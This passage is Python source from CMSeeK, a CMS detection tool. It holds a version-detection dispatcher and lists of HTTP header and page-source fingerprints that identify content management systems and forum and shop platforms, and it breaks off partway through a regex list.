#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

def start(id, url, ua, ga, source, ga_content, headers):
    if id == "wp":
        # trust me more will be added soon
        import VersionDetect.wp as wpverdetect
        wpver = wpverdetect.start(id, url, ua, ga, source)
        return wpver
    elif id == 'joom':
        import VersionDetect.joom as joomverdetect
        joomver = joomverdetect.start(id, url, ua, ga, source)
        return joomver
    elif id == 'dru':
        import VersionDetect.dru as druverdetect
        druver = druverdetect.start(id, url, ua, ga, source)
        return druver
    elif id == 'xe':
        import VersionDetect.xe as xeverdetect
        xever = xeverdetect.start(ga_content)
        return xever
    elif id == 'wgui':
        import VersionDetect.wgui as wguiverdetect
        wguiver = wguiverdetect.start(ga_content)
        return wguiver
    elif id == 'umi':
        import VersionDetect.umi as umiverdetect
        umiver = umiverdetect.start(url, ua)
        return umiver
    elif id == 'tidw':
        import VersionDetect.tidw as tidwverdetect
        tidwver = tidwverdetect.start(source)
        return tidwver
    elif id == 'sulu':
        import VersionDetect.sulu as suluverdetect
        suluver = suluverdetect.start(url, ua)
        return suluver
    elif id == 'subcms':
        import VersionDetect.subcms as subcmsverdetect
        subcmsver = subcmsverdetect.start(ga_content)
        return subcmsver
    elif id == 'snews':
        import VersionDetect.snews as snewsverdetect
        snewsver = snewsverdetect.start(ga_content, source)
        return snewsver
    elif id == 'spity':
        import VersionDetect.spity as spityverdetect
        spityver = spityverdetect.start(ga_content)
        return spityver
    elif id == 'slcms':
        import VersionDetect.slcms as slcmsverdetect
        slcmsver = slcmsverdetect.start(source)
        return slcmsver
    elif id == 'rock':
        import VersionDetect.rock as rockverdetect
        rockver = rockverdetect.start(ga_content)
        return rockver
    elif id == 'roadz':
        import VersionDetect.roadz as roadzverdetect
        roadzver = roadzverdetect.start(ga_content)
        return roadzver
    elif id == 'rite':
        import VersionDetect.rite as riteverdetect
        ritever = riteverdetect.start(ga_content)
        return ritever
    elif id == 'quick':
        import VersionDetect.quick as quickverdetect
        quickver = quickverdetect.start(ga_content)
        return quickver
    elif id == 'pwind':
        import VersionDetect.pwind as pwindverdetect
        pwindver = pwindverdetect.start(ga_content)
        return pwindver
    elif id == 'ophal':
        import VersionDetect.ophal as ophalverdetect
        ophalver = ophalverdetect.start(ga_content, url, ua)
        return ophalver
    elif id == 'sfy':
        import VersionDetect.sfy as sfyverdetect
        sfyver = sfyverdetect.start(ga_content)
        return sfyver
    elif id == 'otwsm':
        import VersionDetect.otwsm as otwsmverdetect
        otwsmver = otwsmverdetect.start(source)
        return otwsmver
    elif id == 'ocms':
        import VersionDetect.ocms as ocmsverdetect
        ocmsver = ocmsverdetect.start(url, ua)
        return ocmsver
    elif id == 'share':
        import VersionDetect.share as shareverdetect
        sharever = shareverdetect.start(url, ua)
        return sharever
    elif id == 'mura':
        import VersionDetect.mura as muraverdetect
        muraver = muraverdetect.start(ga_content)
        return muraver
    elif id == 'kbcms':
        import VersionDetect.kbcms as kbcmsverdetect
        kbcmsver = kbcmsverdetect.start(url, ua)
        return kbcmsver
    elif id == 'koken':
        import VersionDetect.koken as kokenverdetect
        kokenver = kokenverdetect.start(ga_content)
        return kokenver
    elif id == 'impage':
        import VersionDetect.impage as impageverdetect
        impagever = impageverdetect.start(ga_content)
        return impagever
    elif id == 'flex':
        import VersionDetect.flex as flexverdetect
        flexver = flexverdetect.start(source, url, ua)
        return flexver
    elif id == 'dncms':
        import VersionDetect.dncms as dncmsverdetect
        dncmsver = dncmsverdetect.start(url, ua)
        return dncmsver
    elif id == 'cntsis':
        import VersionDetect.cntsis as cntsisverdetect
        cntsisver = cntsisverdetect.start(ga_content)
        return cntsisver
    elif id == 'cnido':
        import VersionDetect.cnido as cnidoverdetect
        cnidover = cnidoverdetect.start(ga_content)
        return cnidover
    elif id == 'con5':
        import VersionDetect.con5 as con5verdetect
        con5ver = con5verdetect.start(ga_content)
        return con5ver
    elif id == 'csim':
        import VersionDetect.csim as csimverdetect
        csimver = csimverdetect.start(ga_content)
        return csimver
    elif id == 'brcms':
        import VersionDetect.brcms as brcmsverdetect
        brcmsver = brcmsverdetect.start(ga_content)
        return brcmsver
    elif id == 'bboard':
        import VersionDetect.bboard as bboardverdetect
        bboardver = bboardverdetect.start(source)
        return bboardver
    elif id == 'dscrs':
        import VersionDetect.dscrs as dscrsverdetect
        dscrsver = dscrsverdetect.start(ga_content)
        return dscrsver
    elif id == 'discuz':
        import VersionDetect.discuz as discuzverdetect
        discuzver = discuzverdetect.start(ga_content)
        return discuzver
    elif id == 'minibb':
        import VersionDetect.minibb as minibbverdetect
        minibbver = minibbverdetect.start(source)
        return minibbver
    elif id == 'mybb':
        import VersionDetect.mybb as mybbverdetect
        mybbver = mybbverdetect.start(source)
        return mybbver
    elif id == 'nodebb':
        import VersionDetect.nodebb as nodebbverdetect
        nodebbver = nodebbverdetect.start(source)
        return nodebbver
    elif id == 'punbb':
        import VersionDetect.punbb as punbbverdetect
        punbbver = punbbverdetect.start(source)
        return punbbver
    elif id == 'smf':
        import VersionDetect.smf as smfverdetect
        smfver = smfverdetect.start(source)
        return smfver
    elif id == 'vanilla':
        import VersionDetect.vanilla as vanillaverdetect
        vanillaver = vanillaverdetect.start(url, ua)
        return vanillaver
    elif id == 'uknva':
        import VersionDetect.uknva as uknvaverdetect
        uknvaver = uknvaverdetect.start(ga_content)
        return uknvaver
    elif id == 'xmb':
        import VersionDetect.xmb as xmbverdetect
        xmbver = xmbverdetect.start(source)
        return xmbver
    elif id == 'yabb':
        import VersionDetect.yabb as yabbverdetect
        yabbver = yabbverdetect.start(source)
        return yabbver
    elif id == 'aef':
        import VersionDetect.aef as aefverdetect
        aefver = aefverdetect.start(source)
        return aefver
    elif id == 'bhf':
        import VersionDetect.bhf as bhfverdetect
        bhfver = bhfverdetect.start(ga_content)
        return bhfver
    elif id == 'fudf':
        import VersionDetect.fudf as fudfverdetect
        fudfver = fudfverdetect.start(source)
        return fudfver
    elif id == 'yaf':
        import VersionDetect.yaf as yafverdetect
        yafver = yafverdetect.start(source)
        return yafver
    elif id == 'ubbt':
        import VersionDetect.ubbt as ubbtverdetect
        ubbtver = ubbtverdetect.start(source, ga_content)
        return ubbtver
    elif id == 'myupb':
        import VersionDetect.myupb as myupbverdetect
        myupbver = myupbverdetect.start(source)
        return myupbver
    elif id == 'mvnf':
        import VersionDetect.mvnf as mvnfverdetect
        mvnfver = mvnfverdetect.start(source)
        return mvnfver
    elif id == 'mcb':
        import VersionDetect.mcb as mcbverdetect
        mcbver = mcbverdetect.start(source)
        return mcbver
    elif id == 'aspf':
        import VersionDetect.aspf as aspfverdetect
        aspfver = aspfverdetect.start(source)
        return aspfver
    elif id == 'jf':
        import VersionDetect.jf as jfverdetect
        jfver = jfverdetect.start(source)
        return jfver
    elif id == 'mg':
        import VersionDetect.mg as mgverdetect
        mgver = mgverdetect.start(url, ua)
        return mgver
    elif id == 'coms':
        import VersionDetect.coms as comsverdetect
        comsver = comsverdetect.start(url, ua)
        return comsver
    elif id == 'abda':
        import VersionDetect.abda as abdaverdetect
        abdaver = abdaverdetect.start(source)
        return abdaver
    elif id == 'dweb':
        import VersionDetect.dweb as dwebverdetect
        dwebver = dwebverdetect.start(ga_content)
        return dwebver
    elif id == 'qcart':
        import VersionDetect.qcart as qcartverdetect
        qcartver = qcartverdetect.start(ga_content)
        return qcartver
    elif id == 'rbsc':
        import VersionDetect.rbsc as rbscverdetect
        rbscver = rbscverdetect.start(ga_content)
        return rbscver
    elif id == 'oracle_atg':
        import VersionDetect.atg as atgverdetect
        atgver = atgverdetect.start(headers)
        return atgver
    elif id == 'umbraco':
        import VersionDetect.umbraco as umbracoverdetect
        umbracover = umbracoverdetect.start(headers, url, ua)
        return umbracover
    elif id == 'shopfa':
        import VersionDetect.shopfa as shopfaverdetect
        shopfaver = shopfaverdetect.start(ga_content, headers)
        return shopfaver
    elif id == 'amiro':
        import VersionDetect.amiro as amiroverdetect
        amirover = amiroverdetect.start(source)
        return amirover
    elif id == 'godaddywb':
        import VersionDetect.godaddywb as godaddywbverdetect
        godaddywb_version = godaddywbverdetect.start(ga_content)
        return godaddywb_version
    elif id == 'hugo':
        import VersionDetect.hugo as hugodetect
        return hugodetect.start(source)



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra
# This file contains all the methods of detecting cms via http Headers
# Version: 1.0.0
# Return a list with ['1'/'0','ID of CMS'/'na'] 1 = detected 0 = not detected
import re
import cmseekdb.basic as cmseek

def check(hstring):
    if hstring == "":
        return ['0', 'na']
    else:
        #hstring = h
        # harray = h.split("\n") # will use whenever necessary

        #### START DETECTION FROM HERE

        header_detection_keys = [
        '/wp-json/:-wp',
        'X-Drupal-||19 Nov 1978 05:-dru',
        'Expires: Wed, 17 Aug 2005 00:00:00 GMT:-joom',
        'X-Wix-:-wix',
        'Set-Cookie: ushahidi:-ushahidi',
        'X-Generated-By: UMI.CMS:-umi',
        'x-generator: Sulu:-sulu',
        'X-Powered-CMS: Subrion CMS:-subcms',
        'Set-Cookie: SQ_SYSTEM_SESSION||squizedge.net:-sqm',
        'spincms:-spin',
        'solodev_session:-sdev',
        'SC_ANALYTICS_GLOBAL_COOKIE:-score',
        'X-ServedBy: simplebo||_simplebo_tool_session:-spb',
        'X-Blog: Serendipity||Set-Cookie: serendipity[||Set-Cookie: s9y_:-spity',
        'Set-Cookie: SEAMLESS_IDENTIFIER:-slcms',
        'X-Powered-By: Roadiz CMS:-roadz',
        'X-Powered-By: pimcore:-pcore',
        'x-powered-by: PencilBlue:-pblue',
        'x-powered-by: Ophal:-ophal',
        'x-powered-by: Zyro.com:-zyro',
        'Server: OpenCms:-ocms',
        'X-Odoo-:-odoo',
        'X-SharePointHealthScore||SPIisLatency||SPRequestGuid||MicrosoftSharePointTeamServices||SPRequestDuration:-share',
        'october_session:-octcms',
        'Generator: Mura CMS:-mura',
        'X-Powered-By: MODX:-modx',
        'X-KoobooCMS-Version:-kbcms',
        'X-Jimdo-:-jimdo',
        'Set-Cookie: ndxz_:-ibit',
        'X-Jcms-Ajax-Id:-jcms',
        'Set-Cookie: grav-site-:-grav',
        'X-Powered-By: FlexCMP||X-Flex-Tag:||X-Flex-Lang:||X-Flex-Lastmod:||X-Flex-Community:||X-Flex-Evstart:-flex',
        'X-Powered-By: eZ Publish||Set-Cookie: eZSESSID:-ezpu',
        'Set-Cookie: exp_tracker||Set-Cookie: exp_last_activity||Set-Cookie: exp_last_visit||Set-Cookie: exp_csrf_token=:-exen',
        'X-Powered-By: e107||Set-Cookie: SESSE107COOKIE:-e107',
        'Set-Cookie: dnn_IsMobile||DNNOutputCache||DotNetNuke:-dnn',
        'X-Powered-By: CMS Danneo:-dncms',
        'X-Powered-By: Craft CMS||Set-Cookie: CraftSessionId:-craft',
        'X-Powered-By: Dragonfly CMS:-dragon',
        'X-Generator: Orchard:-orchd',
        'X-Powered-By: ContentBox||Set-Cookie: LIGHTBOXSESSION:-cbox',
        'Set-Cookie: CONCRETE5:-con5',
        'X-Discourse-Route:-dscrs',
        'Set-Cookie: flarum_session=:-flarum',
        'IPSSessionFront||ipbWWLmodpids||ipbWWLsession_id:-ipb',
        'X-Powered-By: NodeBB:-nodebb',
        'X-Garden-Version: Vanilla||Maybe you should be reading this instead: https://www.vanillaforums.com/en/careers:-vanilla',
        'Set-Cookie: xf_session=||Set-Cookie: xf_csrf=:-xf',
        '[aefsid]:-aef',
        'Set-Cookie: fud_session_:-fudf',
        'Set-Cookie: phorum_session:-phorum',
        'Set-Cookie: yazdLastVisited=:-yazd',
        'Set-Cookie: ubbt_:-ubbt',
        'X-Powered-By: Afosto||Link: <//afosto-cdn:-afsto',
        'X-Arastta:-arstta',
        'set-cookie: fornax_anonymousId=:-bigc',
        'Set-Cookie: bigwareCsid||Set-Cookie: bigWAdminID:-bigw',
        'X-ATG-Version:-oracle_atg',
        'Set-Cookie: MoodleSession||Set-Cookie: MOODLEID_:-mdle',
        'COMMERCE-SERVER-SOFTWARE:||commerce-server-software::-coms',
        'Set-Cookie: COSMOSHOP_:-cosmos',
        'Set-Cookie: Dynamicweb:-dweb',
        'X-Elcodi::-elcd',
        'X-Powered-By: eZ Publish:-ezpub',
        'Powered-By: PrestaShop||Set-Cookie: PrestaShop:-presta',
        'Demandware Secure Token||Demandware anonymous cookie||dwpersonalization_||dwanonymous_:-sfcc',
        'X-Umbraco-Version:-umbraco',
        'X-Shopery||This E-commerce is built using Shopery:-shopery',
        'X-Powered-By: ShopFA:-shopfa',
        'X-ShopId::::X-ShardId:-shopify',
        'X-Shopify-Stage||set-cookie: _shopify||Set-Cookie: secure_customer_sig:-shopify',
        'SRV_ID=shoptet:-shoptet',
        'Set-Cookie: _SOLUSQUARE:-solusquare',
        'Set-Cookie: _spree_store_session:-spree',
        'X-Powered-CMS: Bitrix Site Manager:-bitrix',
        'X-Powered-By: Brightspot:-brightspot',
        'Set-Cookie: WHMCS:-whmcs',
        'X-Powered-By: OpenNemas||Via: Opennemas Proxy Server:-opennemas',
        'Set-Cookie::::domain=.notion.site:-notion'
        ]        
        for header_key in header_detection_keys:
            if ':-' in header_key:
                detection_string = header_key.split(':-')
                if '||' in detection_string[0]:
                    # check if there are multiple detection strings
                    detection_strings = detection_string[0].split('||')
                    for d in detection_strings:
                        if d in hstring and detection_string[1] not in cmseek.ignore_cms: # ignore cms thingy - what i mean is check if the cms_id is not in the ignore list
                            if cmseek.strict_cms == [] or detection_string[1] in cmseek.strict_cms:
                                return ['1', detection_string[1]]
                elif '::::' in detection_string[0]:
                    # :::: is used when we want to check if both detection strings are present in the header. 
                    match_status = '0' # 0 = neutral, 1 = passed, 2 = failed
                    keys_to_match = detection_string[0].split('::::')
                    for check_key in keys_to_match:
                        if match_status == '0' or match_status == '1':
                            if check_key in hstring:
                                match_status = '1'
                            else:
                                match_status = '2'
                        else:
                            match_status = '2'
                    if match_status == '1' and detection_string[1] not in cmseek.ignore_cms:
                        if cmseek.strict_cms == [] or detection_string[1] in cmseek.strict_cms:
                            return ['1', detection_string[1]]
                else:
                    if detection_string[0] in hstring and detection_string[1] not in cmseek.ignore_cms:
                        if cmseek.strict_cms == [] or detection_string[1] in cmseek.strict_cms:
                            return ['1', detection_string[1]]

        ####################################################
        #         REGEX DETECTIONS STARTS FROM HERE        #
        ####################################################

        header_detection_keys_regex = [
        'Set-Cookie: (YaBBusername=|YaBBpassword=|YaBBSession|Y2User-(\d.*?)|Y2Pass-(\d.*?)|Y2Sess-(\d.*?))=:-yabb',
        'Set-Cookie: xmblv(a|b)=(\d.*?)\n:-xmb',
        'Set-Cookie: [a-zA-Z0-9]{5}_(lastpos|lastvisit)=:-pwind',
        'Set-Cookie: mybb\[(.*?)\]=:-mybb',
        'Set-Cookie: wcf(.*?)_cookieHash=:-bboard',
        'X-XRDS-Location: (.*?)EPiServerCommunity:-epis',
        'lep(.*?)sessionid:-lepton',
        'Set-Cookie: phpbb(.*?)=:-phpbb',
        'Set-Cookie: ses(\d+)=:-impage',
        'Set-Cookie: sid_customer_[a-zA-Z0-9]{5}=:-csc',
        'X-Host: (.*?)weebly.net:-weebly',
        'Set-Cookie: (ekmMsg|ekmpowershop):-ekmps'
        ]
        # so here's the story, i've been watching regex_key x regex_key for last 2 weeks and i just finished it.
        # In the following lines you'll find some weird variable names, those are characters from detection_key.
        # Thank you for reading this utterly useless comment.. now let's get back to work!

        # Update 2019 - ^ That was a mistake time to fix this abomination
        for detection_key in header_detection_keys_regex:
            if ':-' in detection_key:
                regex_key = detection_key.split(':-')
                if '||' in regex_key[0]:
                    match_strings = regex_key[0].split('||')
                    for match_string in match_strings:
                        regex_match_status = re.search(match_string, hstring, re.DOTALL)
                        if regex_match_status != None and regex_key[1] not in cmseek.ignore_cms:
                            if cmseek.strict_cms == [] or regex_key[1] in cmseek.strict_cms:
                                return ['1', regex_key[1]]
                else:
                    regex_match_status = re.search(regex_key[0], hstring, re.DOTALL)
                    if regex_match_status != None and regex_key[1] not in cmseek.ignore_cms:
                        if cmseek.strict_cms == [] or regex_key[1] in cmseek.strict_cms:
                            return ['1', regex_key[1]]
        else:
            # Failure
            return ['0', 'na']



#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra

# This file contains all the methods of detecting cms via Source Code
# Version: 1.0.0
# Return a list with ['1'/'0','ID of CMS'/'na'] 1 = detected 0 = not detected 2 = No Sourcecode Provided

import re
import cmseekdb.basic as cmseek

def check(page_source_code, site): ## Check if no generator meta tag available
    if page_source_code == "": ## No source code provided kinda shitty check but oh well
        return ['2', 'na']
    else: ## The real shit begins here
        # hstring = s
        # harray = s.split("\n") ### Array conversion can use if needed later

        page_source_detection_keys = [
        "/wp-content/||/wp-include/:-wp",
        "/skin/frontend/||x-magento-init:-mg",
        "https://www.blogger.com/static/:-blg",
        "ic.pics.livejournal.com:-lj",
        "END: 3dcart stats:-tdc",
        "href=\"/apos-minified/:-apos",
        "href=\"/CatalystStyles/:-abc",
        "/misc/drupal.js:-dru",
        "css/joomla.css:-joom",
        "Powered By <a href=\"http://www.opencart.com\">OpenCart||\"catalog/view/javascript/jquery/swiper/css/opencart.css\"||index.php?route=:-oc",
        "/xoops.js||xoops_redirect:-xoops",
	    "tildacdn.com:-tilda",
        "Wolf Default RSS Feed:-wolf",
        "/ushahidi.js||alt=\"Ushahidi\":-ushahidi",
        "getWebguiProperty:-wgui",
        "title: \"TiddlyWiki\"||TiddlyWiki created by Jeremy Ruston,:-tidw",
        "Running Squiz Matrix:-sqm",
        "assets.spin-cdn.com:-spin",
        "content=\"Solodev\" name=\"author\":-sdev",
        "content=\"sNews:-snews",
        "/api/sitecore/:-score",
        "simsite/:-sim",
        "simplebo.net/:-spb",
        "/silvatheme:-silva",
        "serendipityQuickSearchTermField ||\"serendipity_||serendipity[:-spity",
        "Published by Seamless.CMS.WebUI:-slcms",
        "rock-config-trigger||rock-config-cancel-trigger:-rock",
        "/rcms-f-production.:-rcms",
        "CMS by Quick.Cms:-quick",
        "Powered by Quick.Cart:-quick",
        "DataLife Engine||dle_js.js:-dle",
        "Roundcube Webmail||rcube_webmail:-rcube",
        "bitrix||Bitrix:-bitrix", # your Captain Obvious
        "\"pimcore_:-pcore",
        "xmlns:perc||cm/css/perc_decoration.css:-percms",
        "PencilBlueController||\"pencilblueApp\":-pblue",
        "/libraries/ophal.js:-ophal",
        "Sitefinity/WebsiteTemplates:-sfy",
        "assets.zyrosite.com:-zyro",
        "published by Open Text Web Solutions:-otwsm",
        "/opencms/export/:-ocms",
        "odoo.session_info||var odoo =:-odoo",
        "_spBodyOnLoadWrapper||_spPageContextInfo||_spFormOnSubmitWrapper:-share",
        "/storage/app/media/:-octcms",
        "mura.min.css||/plugins/Mura:-mura",
        "mt-content/||moto-website-style:-moto",
        "mono_donottrack||monotracker.js ||_monoTracker:-mnet",
        "Powered by MODX</a>:-modx",
        "siteCMS:methode\"||\"contentOriginatingCMS=Methode\"||Methode tags version||/r/PortalConfig/common/assets/:-methd",
        "var LIVESTREET_SECURITY_KEY:-lscms",
        "/koken.js||data-koken-internal:-koken",
        "jimdo_layout_css||var jimdoData||isJimdoMobileApp:-jimdo",
        "<!-- you must provide a link to Indexhibit||\"Built with <a href=http://www.indexhibit.org/>Indexhibit\"||ndxz-studio/site||ndxzsite/:-ibit",
        "<!-- webflow css -->||css/webflow.css||js/webflow.js:-wflow",
        "css/jalios/core/||js/jalios/core/||jalios:ready:-jcms",
        "ip_themes/||ip_libs/||ip_cms/:-impage",
        "/css_js_cache/hotaru_css||hotaruFooterImg||/css_js_cache/hotaru_js:-hotaru",
        "binaries/content/gallery/:-hippo",
        "PHP-Nuke Copyright ©||PHP-Nuke theme by:-phpn",
        "FlexCMP - CMS per Siti Accessibili||/flex/TemplatesUSR/||FlexCMP - Digital Experience Platform (DXP):-flex",
        "copyright\" content=\"eZ Systems\"||ezcontentnavigationpart||ezinfo/copyright:-ezpu",
        "e107_files/e107.js||e107_themes/||e107_plugins/:-e107",
        "<!-- DNN Platform|| by DNN Corporation -->||DNNROBOTS||js/dnncore.js?||dnn_ContentPane||js/dnn.js?:-dnn",
        "phpBBstyle||phpBBMobileStyle||style_cookie_settings:-phpbb",
        "dede_fields||dede_fieldshash||DedeAjax||DedeXHTTP||include/dedeajax2.js||css/dedecms.css:-dede",
        "/Orchard.jQuery/||orchard.themes||orchard-layouts-root:-orchd",
        "modules/contentbox/themes/:-cbox",
        "data-contentful||.contentful.com/||.ctfassets.net/:-conful",
        "Contensis.current||ContensisSubmitFromTextbox||ContensisTextOnly:-contensis",
        "system/cron/cron.txt:-contao",
        "/burningBoard.css||wcf/style/:-bboard",
        "/concrete/images||/concrete/css||/concrete/js:-con5",
        "discourse_theme_id||discourse_current_homepage:-discrs",
        "discuz_uid||discuz_tips||content=\"Discuz! Team and Comsenz UI Team\":-discuz",
        "flarum-loading||flarum/app:-flarum",
        "/* IP.Board||js/ipb.js||js/ipb.lang.js:-ipb",
        "ips_usernameand ips_password:-ipb",
        "bb_default_style.css||name=\"URL\" content=\"http://www.minibb.net/\":-minibb",
        "var MyBBEditor:-mybb",
        "/assets/nodebb.min.js||/plugins/nodebb-:-nodebb",
        "PUNBB.env||typeof PUNBB ===:-punbb",
        "Powered by SMF:-smf",
        "vanilla_discussions_index||vanilla_categories_index:-vanilla",
        "Forum software by XenForo&trade;||<html id=\"XenForo\"||css.php?css=xenforo:-xf",
        "<!-- Powered by XMB||<!-- The XMB Group -->||Powered by XMB:-xmb",
        "yabbfiles/:-yabb",
        "Powered By AEF:-aef",
        "Powered by: FUDforum:-fudf",
        "<div id=\"phorum\">:-phorum",
        "\"YafHead:-yaf",
        "<!-- NoNonsense Forum:-nnf",
        "/mvnplugin/mvnforum/:-mvnf",
        "aspnetforum.css\"||_AspNetForumContentPlaceHolder:-aspf",
        "jforum/templates/:-jf",
        "This OnlineStore is brought to you by ViA-Online GmbH Afterbuy.:-abuy",
        '/arastta.js:-arstta',
        '<script src=\'//bizweb.dktcdn.net:-bizw',
        'cloudcart","title:-cloudc',
        'framework/colormekit.css:-cmshop',
        '<meta name="keywords" content="moodle:-mdle',
        '<meta property="ajaris:baseURL"||<meta property="ajaris:language"||<meta property="ajaris:ptoken":-orkis',
        'window.Comandia = JSON.parse||<script src="https://cdn.mycomandia.com/static/shop/common/js/functions.js"></script>:-cmdia',
        '/bundles/elcodimetric/js/tracker.js:-elcd',
        'de_epages.remotesearch.ui.suggest||require([[\'de_epages\':-epgs',
        'href="https://www.fortune3.com/en/siterate/rate.css":-for3',
        '<body class="gridlock shifter">::::<div class="shifter-page">:-btree',
        'list-unstyled::::editable-zone:-pmoc',
        '<!-- Demandware Analytics code||<!-- Demandware Apple Pay -->:-sfcc',
        'icons__icons___XoCGh||styles__empty___3WCoC||icons__icon-phone___22Eum:-sazito',
        'SHOPATRON-CRAWLER:-shopatron',
        'Umbraco/||umbraco/:-umbraco',
        'Sklep internetowy Shoper.pl:-shoper',
        '//www.googletagmanager.com/ns.html?id=GTM-N2T2D3:-shopery',
        'shopfa_license:-shopfa',
        '/smjslib.js||/smartstore.core.js:-smartstore',
        '_W.configDomain||Weebly.footer:-weebly',
        'js/whmcs.js:-whmcs',
        'OpenNeMaS CMS by Openhost||var u = "https://piwik.openhost.es/":-opennemas',
        'zenid=||Congratulations! You have successfully installed your Zen Cart||Google Code for ZenCart Google||Powered by ZenCart||sideboxpzen-cart||stylesheet_zen_lightbox.css:-zencart',
        'Redakční systém IPO||cdn.antee.cz/||ipo.min.js:-ipo',
        'Built using HUGO:-hugo',
        'This is Squarespace||End of Squarespace Headers:-squarespace',
        'Developed by Inware AG - www.inware.ch:-freshpage'
        ]

        for detection_key in page_source_detection_keys:
            if ':-' in detection_key:
                detection_array = detection_key.split(':-')
                if '||' in detection_array[0]:
                    idkwhat = detection_array[0]
                    detection_strings = idkwhat.split('||')
                    for detection_string in detection_strings:
                        if detection_string in page_source_code and detection_array[1] not in cmseek.ignore_cms: # check if the cms_id is not in the ignore list
                            if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms:
                                return ['1', detection_array[1]]
                elif '::::' in detection_array[0]:
                    # :::: is used when we want to check if both detection strings are present in the source code. 
                    match_status = '0' # 0 = neutral, 1 = passed, 2 = failed
                    match_strings = detection_array[0].split('::::')
                    for match_string in match_strings:
                        if match_status == '0' or match_status == '1':
                            if match_string in page_source_code:
                                match_status = '1'
                            else:
                                match_status = '2'
                        else:
                            match_status = '2'
                    if match_status == '1' and detection_array[1] not in cmseek.ignore_cms:
                        if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms:
                            return ['1', detection_array[1]]
                else:
                    if detection_array[0] in page_source_code and detection_array[1] not in cmseek.ignore_cms:
                        if cmseek.strict_cms == [] or detection_array[1] in cmseek.strict_cms:
                            return ['1', detection_array[1]]

        ####################################################
        #         REGEX DETECTIONS STARTS FROM HERE        #
        ####################################################

        page_source_detection_regex_keys = [
        '(\'|")https\://afosto\-cdn(.*?)\.afosto\.com(.*?)(\'|"):-afsto',
        'Powered by(.*?)JForum(.*?)\</a\>:-jf',
        'Powered by(.*?)AspNetForum(.*?)(\</a\>|\</span\>):-aspf',
        'Powered by(.*?)MercuryBoard(.*?)\</a\>:-mcb',
        'Powered by(.*?)mwForum(.*?)Markus Wichitill:-mvnf',
        'Powered by(.*?)mvnForum(.*?)\</a\>:-mvnf',
        'Powered by myUPB(.*?)\</a\>:-myupb',
        '\>Powered by UBB\.threads(.*?)\</a\>:-ubbt',
        'Powered by(.*?)NoNonsense Forum\</a\>:-nnf',
        '\>Powered by YAF\.NET(.*?)\</a\>:-yaf',
        'aefonload(.*?)\</script\>:-aef',
        'applications/vanilla/(.*?)\.js:-vanilla',
        'var smf_(theme_url|images_url|scripturl) \=(.*?)\</script\>:-smf',
        'Powered by(.*?)PunBB\</a\>:-punbb',
        'Powered by(.*?)NodeBB\</a\>:-nodebb',
        '(Powered By|href\="https\://www\.mybb\.com")(.*?)(MyBB|MyBB Group)\</a\>:-mybb',
        '(powered by|http\://www\.miniBB\.net)(.*?)(miniBB|miniBB forum software):-minibb',
        'Powered by(.*?)FluxBB:-fluxbb',
        'invisioncommunity\.com(.*?)Powered by Invision Community:-ipb',
        'ipb\.(vars|templates|lang)\[(.*?)=(.*?)\</script\>:-ipb',
        '(a href\="http\://www\.woltlab\.com"|Forum Software|Forensoftware)(.*?)Burning Board(.*?)\</strong\>:-bboard',
        'Discourse\.(.*?)\=(.*?)\</script\>:-dscrs',
        'ping\.src \= node\.href(.*?)\</script\>:-arc',
        'binaries/(.*?)/content/gallery/:-hippo',
        '\.php\?m\=(.*?)&c\=(.*?)&a\=(.*?)&catid\=:-phpc',
        'Powered by (.*?)phpBB:-phpbb',
        'copyright(.*?)phpBB Group:-phpbb',
        'Powered by(.*?)Cotonti:-coton',
        'CCM_(.*?)(_|)(MODE|URL|PATH|FILENAME|REL|CID):-con5',
        '\<link href\=(.*?)cdn(\d).bigcommerce\.com\/:-bigc',
        '\<a href\=(.*?)main_bigware_(\d)\.php:-bigw',
        'var Bizweb \=(.*?)\</script\>:-bizw',
        'var clientexec \=(.*?)\</script\>||Powered by(.*?)http\://www\.clientexec\.com\?source\=poweredby(.*?)\</a\>:-cexec',
        '\<meta name\=(.*?)author(.*?)CloudCart LLC(.*?)\>:-cloudc',
        'var Colorme \=(.*?)\</script\>:-cmshop',
        'https://cdn.mycomandia.com/uploads/comandia_(.*?)/r/(.*?)//js/(functions|main).js:-cmdia',
        '<script(.*?)cosmoshop_functions.js(.*?)</script>:-cosmos',
        '.cm-noscript(.*?)</script>:-csc',
        '<link(.*?)cubecart.common.css(.*?)>:-cubec',
        '<a href(.*?)http://www.almubda.net(.*?)Powered by Al Mubda(.*?)</a>:-abda',
        '<!--(.*?)Dynamicweb Software(.*?)-->:-dweb',
        '<script(.*?)eccube.js(.*?)</script>||<script(.*?)win_op.js(.*?)</script>||<script(.*?)cube.site.js(.*?)</script>:-ecc',
        '<script(.*?)Tracker generator for elcodi bamboo store(.*?)</script>:-elcd',
        'href=(.*?)/epages/(.*?).sf(.*?)</a>:-epgs',
        '<script(.*?)/extension/iagutils/design/ezwebin/(.*?)</script>:-ezpub',
        'Powered by(.*?)Fortune3</a>:-for3',
        'Built on(.*?)bigtreecms.org(.*?)BigTree CMS:-btree',
        'powered(.*?)opensolution.org(.*?)Sklep internetowy',
        'href\=(.*?)on/demandware.static:-sfcc',
        'href\=(.*?)mediacdn.shopatron.com||href\=(.*?)cdn.shptrn.com:-shopatron',
        'href\=(.*?)rwd_shoper(|_1):-shoper',
        '(cdn|font).shopery.com/:-shopery',
        'href\=(.*?)cdn.shopfa.com/||href\=(.*?)cdnfa.com/:-shopfa',
        'id=("|\')(shopify-digital-wallet|shopify-features)||href\=(.*?)cdn.shopify.com/:-shopify',
        'href\=(.*?)cdn.myshoptet.com/||content="Shoptet.sk"||var shoptet=:-shoptet',
        'css/smartstore.(core|theme|modules).css:-smartstore',
        'src=(.*?)spree/(products|brands)||Spree.(api_key|routes|translations):-spree',
        'meta name\=("|\')brightspot.(contentId|cached)||href=("|\')brightspotcdn:-brightspot',
        'amiro_sys_(css|js).php:-amiro',
        'weebly-(footer|icon):-weebly',
        '/ekmps/(scripts|css|assets|images|shops|designs)||globalstats.ekmsecure.com/hits/stats(-global).js:-ekmps',
        'sf_(wrapper|footer|banner|subnavigation|pagetitle):-godaddywb',
        'onm-(new|image|carousel|big|cropped):-opennemas',
